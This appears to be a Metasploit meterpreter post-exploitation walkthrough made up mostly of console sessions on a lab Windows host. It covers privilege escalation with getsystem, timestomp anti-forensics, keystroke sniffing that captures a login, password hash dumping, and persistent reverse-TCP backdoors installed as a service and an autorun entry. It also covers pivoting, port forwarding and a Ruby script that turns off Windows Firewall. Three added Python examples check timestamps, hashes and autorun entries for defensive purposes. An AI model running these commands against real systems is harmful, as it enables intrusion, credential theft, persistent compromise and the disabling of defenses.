1. Privilege escalation and process migration

meterpreter > getsystem -h

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:
    -t <opt>  The technique to use. (Default to '0').

    0 : All techniques available
    1 : Service - Named Pipe Impersonation (In Memory/Admin)
    2 : Service - Named Pipe Impersonation (Dropper/Admin)
    3 : Service - Token Duplication (In Memory/Admin)
    4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getuid
Server username: DARKLORD-PC\DARKLORD

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > migrate 2084
[*] Migrating to 2084...
[*] Migration completed successfully.

-----------------------------------------------------------------------
2. Setting up multiple communication channels with target

meterpreter > execute -h

Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -k        Execute process on the meterpreters current desktop
    -m        Execute from memory.
    -s <opt>  Execute process in a given session as the session user
    -t        Execute process with currently impersonated thread token

meterpreter > execute -f notepad.exe -c

Process 5708 created.
Channel 1 created.

meterpreter > execute -f cmd.exe -c

Process 4472 created.
Channel 2 created.

meterpreter > execute -f calc.exe -c

Process 6000 created.
Channel 3 created.

meterpreter > write 5

Enter data followed by a '.' on an empty line:

Metasploit!!
.
[*] Wrote 13 bytes to channel 5.

meterpreter > interact 2
Interacting with channel 2...

Microsoft Windows [Version 6.1.7264]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\DARKLORD\Desktop>
------------------------------------------------------------------------

3. Changing the attributes using timestomp

meterpreter > timestomp d:\secret.doc -v

Modified      : 2011-12-12 16:37:48 +0530
Accessed      : 2011-12-12 16:37:48 +0530
Created       : 2011-12-12 16:37:47 +0530
Entry Modified: 2011-12-12 16:47:56 +0530

meterpreter > timestomp d:\secret.doc -c  "3/13/2013 13:13:13"
[*] Setting specific MACE attributes on d:secret.doc

meterpreter > timestomp d:\secret.doc -m "3/13/2013 13:13:23"

[*] Setting specific MACE attributes on d:secret.doc

meterpreter > timestomp d:\secret.doc -a "3/13/2013 13:13:33"

[*] Setting specific MACE attributes on d:secret.doc

meterpreter > timestomp d:\secret.doc -v

Modified      : 2013-03-13 13:13:13 +0530
Accessed      : 2013-03-13 13:13:23 +0530
Created       : 2013-03-13 13:13:33 +0530
Entry Modified: 2013-03-13 13:13:13 +0530
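The two `timestomp -v` readings above are exactly what an analyst gets back from an MFT export, so they make a good input for the consistency checks a forensic reviewer runs to spot manipulated timestamps. The following is an added example, not code from the original page or from Metasploit; it parses the four MACE lines and applies two checks that stomped files fail (a creation time later than the MFT entry-modified time, and any time later than the moment the evidence was acquired), plus one weak signal that is only reported alongside the others. The acquisition time is an assumption taken from the 2011-12-27 date embedded in the persistence cleanup path later on this page.

```python
from datetime import datetime, timedelta, timezone

# Field labels exactly as "timestomp -v" prints them (order: M, A, C, E)
FIELDS = ("Modified", "Accessed", "Created", "Entry Modified")

# Constructed sample input: the two readings of d:\secret.doc shown above
BEFORE = """\
Modified      : 2011-12-12 16:37:48 +0530
Accessed      : 2011-12-12 16:37:48 +0530
Created       : 2011-12-12 16:37:47 +0530
Entry Modified: 2011-12-12 16:47:56 +0530
"""
AFTER = """\
Modified      : 2013-03-13 13:13:13 +0530
Accessed      : 2013-03-13 13:13:23 +0530
Created       : 2013-03-13 13:13:33 +0530
Entry Modified: 2013-03-13 13:13:13 +0530
"""

# Assumed acquisition time: the 2011-12-27 date embedded in the persistence
# cleanup file name later on this page, in the same +05:30 zone as the stamps.
IST = timezone(timedelta(hours=5, minutes=30))
ACQUIRED_AT = datetime(2011, 12, 27, tzinfo=IST)


def parse_mace(text):
    """Parse 'Label : YYYY-MM-DD HH:MM:SS +ZZZZ' lines into aware datetimes."""
    mace = {}
    for line in text.splitlines():
        # partition on the first colon only; the timestamp itself has more
        label, sep, value = line.partition(":")
        label = label.strip()
        if sep and label in FIELDS:
            mace[label] = datetime.strptime(value.strip(), "%Y-%m-%d %H:%M:%S %z")
    missing = [f for f in FIELDS if f not in mace]
    if missing:
        raise ValueError(f"incomplete MACE block, missing {missing}")
    return mace


def check_mace(mace, acquired_at):
    """Return human-readable anomalies found in one set of MACE values."""
    findings = []
    # The MFT record is written when the file is created, so the record
    # cannot have last changed before the file existed.
    if mace["Created"] > mace["Entry Modified"]:
        findings.append("created after MFT entry was last modified")
    # Nothing on the volume can legitimately carry a time later than the
    # moment the evidence was acquired.
    for name in FIELDS:
        if mace[name] > acquired_at:
            findings.append(f"{name} is in the future relative to acquisition")
    # Weak signal on its own: copying a file keeps Modified and assigns a
    # fresh Created, so only report it when something else is already wrong.
    if findings and mace["Modified"] < mace["Created"]:
        findings.append("modified before created (copy, or stomped)")
    return findings


def audit(text, acquired_at=ACQUIRED_AT):
    """Convenience wrapper: parse one timestomp -v block and check it."""
    return check_mace(parse_mace(text), acquired_at)


if __name__ == "__main__":
    for label, block in (("before", BEFORE), ("after", AFTER)):
        print(label, audit(block) or "no anomalies")
```

The "before" reading passes cleanly; the "after" reading trips every check, because the tool set whole-second values two years ahead of the acquisition date and left the entry-modified time behind the new creation time. On a real image the same checks run over every $STANDARD_INFORMATION record, and comparing those values against the $FILE_NAME timestamps (which user-mode tools do not set) gives a second, independent signal.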
-----------------------------------------------------------------------

4. The getdesktop and keystroke sniffing

meterpreter > enumdesktops

Enumerating all accessible desktops

Desktops
========

    Session  Station   Name
    -------  -------   ----
    0        WinSta0   Default
    0        WinSta0   Disconnect
    0        WinSta0   Winlogon
    0        SAWinSta  SADesktop

meterpreter > getdesktop
Session 0\Service-0x0-3e7$\Default

meterpreter > getdesktop

Session 0\Service-0x0-3e7$\Default

meterpreter > setdesktop
Changed to desktop WinSta0\Default

meterpreter > getdesktop
Session 0\WinSta0\Default

meterpreter > keyscan_start
Starting the keystroke sniffer...

meterpreter > keyscan_dump
Dumping captured keystrokes...

gmail.com <Return> daklord <Tab> 123123


meterpreter > migrate 1180
[*] Migrating to 1180...
[*] Migration completed successfully.

meterpreter > getdesktop
Session 0\WinSta0\Winlogon

meterpreter > migrate 884
[*] Migrating to 884...
[*] Migration completed successfully.

meterpreter > getdesktop
Session 0\WinSta0\Default
---------------------------------------------------------------

5. Using a scraper meterpreter script

meterpreter > run scraper

[*] New session on 192.168.56.1:4232...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Users\DARKLORD\AppData\Local\Temp\UKWKdpIb.reg)
-------------------------------------------------------------------------

6. Passing the hash

meterpreter > getuid
Server username: DARKLORD-PC\DARKLORD

meterpreter > getsystem
...got system (via technique 4).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 78e1241e98c23002bc85fd94c146309d...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DARKLORD:1000:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
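The `hashdump` lines above are in pwdump format (`user:rid:lmhash:nthash:::`), and two of the three accounts carry `31d6cfe0d16ae931b73c59d7e0c089c0` as their NT hash, which is the MD4 of the empty password. The following added example, not code from the page or from Metasploit, parses that format and reports what can be judged from the hashes alone: blank passwords, accounts for which an LM hash is still stored, and passwords shared between accounts. The sample input is the three lines printed above; the two hash constants are the well-known values for an empty password and for "no LM hash stored".

```python
import re

# Well-known constants: the LM field Windows stores when no LM hash is kept
# (or the password is empty), and the NT hash of the empty password
# (MD4 over the empty UTF-16LE string).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample input: the three lines printed by hashdump above
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DARKLORD:1000:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
"""

PWDUMP_LINE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)


def parse_pwdump(text):
    """Parse user:rid:lmhash:nthash::: lines; reject anything malformed."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = PWDUMP_LINE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not in pwdump format: {line!r}")
        records.append({
            "user": m["user"],
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
        })
    return records


def audit_hashes(records):
    """Map each user to the list of policy problems visible from the hashes alone."""
    findings = {r["user"]: [] for r in records}
    by_nt = {}
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings[r["user"]].append("blank password")
        if r["lm"] != EMPTY_LM:
            # A stored LM hash means the password is at most 14 characters
            # and the NoLMHash policy is not in effect for this account
            findings[r["user"]].append("LM hash stored")
        by_nt.setdefault(r["nt"], []).append(r["user"])
    # The same NT hash on two accounts means the same password on both
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for u in users:
                others = sorted(set(users) - {u})
                findings[u].append("password shared with " + ", ".join(others))
    return findings


if __name__ == "__main__":
    for user, problems in audit_hashes(parse_pwdump(SAMPLE)).items():
        print(f"{user}: {', '.join(problems) or 'ok'}")
```

A blank NT hash on the built-in Administrator (RID 500) and Guest (RID 501) accounts is the normal state when those accounts are disabled, so the next step is to confirm the account status rather than treat the finding as an exposure on its own; the same check run over a domain-wide dump is where shared and blank passwords on enabled accounts usually surface.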
----------------------------------------------------------------------------------

7. Setting up a persistent connection with backdoors

meterpreter > run metsvc -h

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the service
    -h        This help menu
    -r        Uninstall an existing Meterpreter service (files must be deleted manually)


meterpreter > run metsvc -A

[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\DARKLORD\AppData\Local\Temp\ygLFhIFX...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
	 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.


meterpreter > run persistence -h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to..
    -L <opt>  Location in target host where to write payload to..
    -P <opt>  Payload to use, default is    
    -S        Automatically start the agent on boot as a service 
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection 
    -p <opt>  The port on the remote host where Metasploit..
    -r <opt>  The IP of the system running Metasploit listening..


meterpreter > run persistence -A -S -U -i 60 -p 4321 -r 192.168.56.101
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DARKLORD-PC_20111227.0307/DARKLORD-PC_20111227.0307.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4321
[*] Persistent agent script is 610795 bytes long
[+] Persistent Script written to C:\Users\DARKLORD\AppData\Local\Temp\LHGtjzB.vbs
[*] Starting connection handler at port 4321 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\Users\DARKLORD\AppData\Local\Temp\LHGtjzB.vbs
[+] Agent executed with PID 5712
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DBDalcOoYlqJSi
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DBDalcOoYlqJSi
[*] Installing as service..
[*] Creating service cpvPbOfXj
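The two scripts above leave the same kind of trace that a startup-entry review is designed to catch: a Run value with a machine-generated name (`DBDalcOoYlqJSi`) pointing at a `.vbs` file in the user's Temp directory, and services (`metsvc`, `cpvPbOfXj`) created under the same directory. The following is an added example, not code from the page or from Metasploit, that triages a list of autorun entries with three heuristics (command runs from a temp directory, payload is a script or script host, name looks random). The entries are constructed from the output above; the command for the `cpvPbOfXj` service is not shown on the page and is a placeholder, the `metsvc` path is assumed from the upload directory shown, and the two benign entries are invented for contrast.

```python
import re

# Constructed sample: the persistence artefacts from the output above plus two
# benign entries for contrast (paths of the benign ones are placeholders)
ENTRIES = [
    {"location": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "DBDalcOoYlqJSi",
     "command": r"C:\Users\DARKLORD\AppData\Local\Temp\LHGtjzB.vbs"},
    {"location": "service",
     "name": "metsvc",
     # path assumed from the temporary installation directory shown above
     "command": r"C:\Users\DARKLORD\AppData\Local\Temp\ygLFhIFX\metsvc.exe"},
    {"location": "service",
     "name": "cpvPbOfXj",
     # the page does not show this service's command; placeholder value
     "command": r"C:\Users\DARKLORD\AppData\Local\Temp\PLACEHOLDER.exe"},
    {"location": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
     "name": "ExampleUpdater",
     "command": r"C:\Program Files\Example\updater.exe"},
    {"location": "service",
     "name": "Spooler",
     "command": r"C:\Windows\System32\spoolsv.exe"},
]

TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.I)
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|wsh|bat|cmd|ps1|hta)\b", re.I)
INTERPRETER = re.compile(r"\b(wscript|cscript|mshta|powershell)(\.exe)?\b", re.I)


def looks_random(name):
    """True for letter-only names of 8+ chars with many case flips or few vowels."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 8 or len(letters) != len(name):
        return False
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    vowels = sum(1 for c in letters if c.lower() in "aeiou")
    return flips >= 4 or vowels / len(letters) < 0.2


def score_entry(entry):
    """Return (score, reasons) for one autorun entry."""
    reasons = []
    cmd = entry["command"]
    # No legitimate service or Run entry executes out of a temp directory
    if TEMP_DIR.search(cmd):
        reasons.append(("runs from a temp directory", 2))
    if SCRIPT_EXT.search(cmd) or INTERPRETER.search(cmd):
        reasons.append(("script or script host as startup payload", 1))
    if looks_random(entry["name"]):
        reasons.append(("name looks machine-generated", 1))
    return sum(w for _, w in reasons), [r for r, _ in reasons]


def triage(entries, threshold=2):
    """Return the entries whose score reaches the threshold, with their reasons."""
    flagged = []
    for e in entries:
        score, reasons = score_entry(e)
        if score >= threshold:
            flagged.append((e["location"], e["name"], score, reasons))
    return flagged


if __name__ == "__main__":
    for location, name, score, reasons in triage(ENTRIES):
        print(f"{score} {location}\\{name}: {'; '.join(reasons)}")
```

The temp-directory test carries the most weight on purpose: the random-name test is a tie-breaker, since plenty of vendor entries have odd names, but nothing that belongs in a Run key or a service runs from a user's Temp folder. Feeding the function a real export (the Run keys and the `ImagePath` of every service) turns it into a quick first pass over a host; the `.rc` cleanup file written by the persistence script lists the exact names to expect on a lab machine.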
------------------------------------------------------------------------------

8. Pivoting with meterpreter

meterpreter > run arp_scanner -r 10.0.2.1/24

[*] ARP Scanning 10.0.2.1/24
[*] IP: 10.0.2.7 MAC 8:26:18:41:fb:33
[*] IP: 10.0.2.9 MAC 41:41:41:41:41:41
meterpreter > background
msf  exploit(handler) > route add 10.0.2.15 255.255.255.0 1

[*] Route added

msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.2.15          255.255.255.0      Session 1

--------------------------------------------------------------------------------------

9. Port forwarding with meterpreter

msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.2.15          255.255.255.0      Session 1

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

meterpreter > portfwd add -l 4321 -p 80 -r 10.0.2.7

[*] Local TCP relay created: 0.0.0.0:4321 <-> 10.0.2.7:80
---------------------------------------------------------------------------------------------

10. Building a Windows Firewall De-activator meterpreter script

# Windows Firewall De-Activator

# Option/parameter parsing

opts = Rex::Parser::Arguments.new(
	"-h" => [ false, "Help menu." ]
)

opts.parse(args) { |opt, idx, val|
	case opt
	when "-h"
		print_line "Meterpreter Script for disabling the default Windows Firewall"
		print_line "Let's hope it works"
		print_line(opts.usage)
		raise Rex::Script::Completed
	end
}

# OS validation and command execution

# Stop on anything that is not a Windows session
unsupported if client.platform !~ /win32|win64/i

begin
	print_status("disabling the default firewall")
	# cmd_exec(command, arguments, timeout in seconds)
	cmd_exec('cmd /c', 'netsh advfirewall set AllProfiles state off', 5)
rescue ::Exception => e
	print_error("Failed to disable the firewall: #{e.class} #{e}")
end


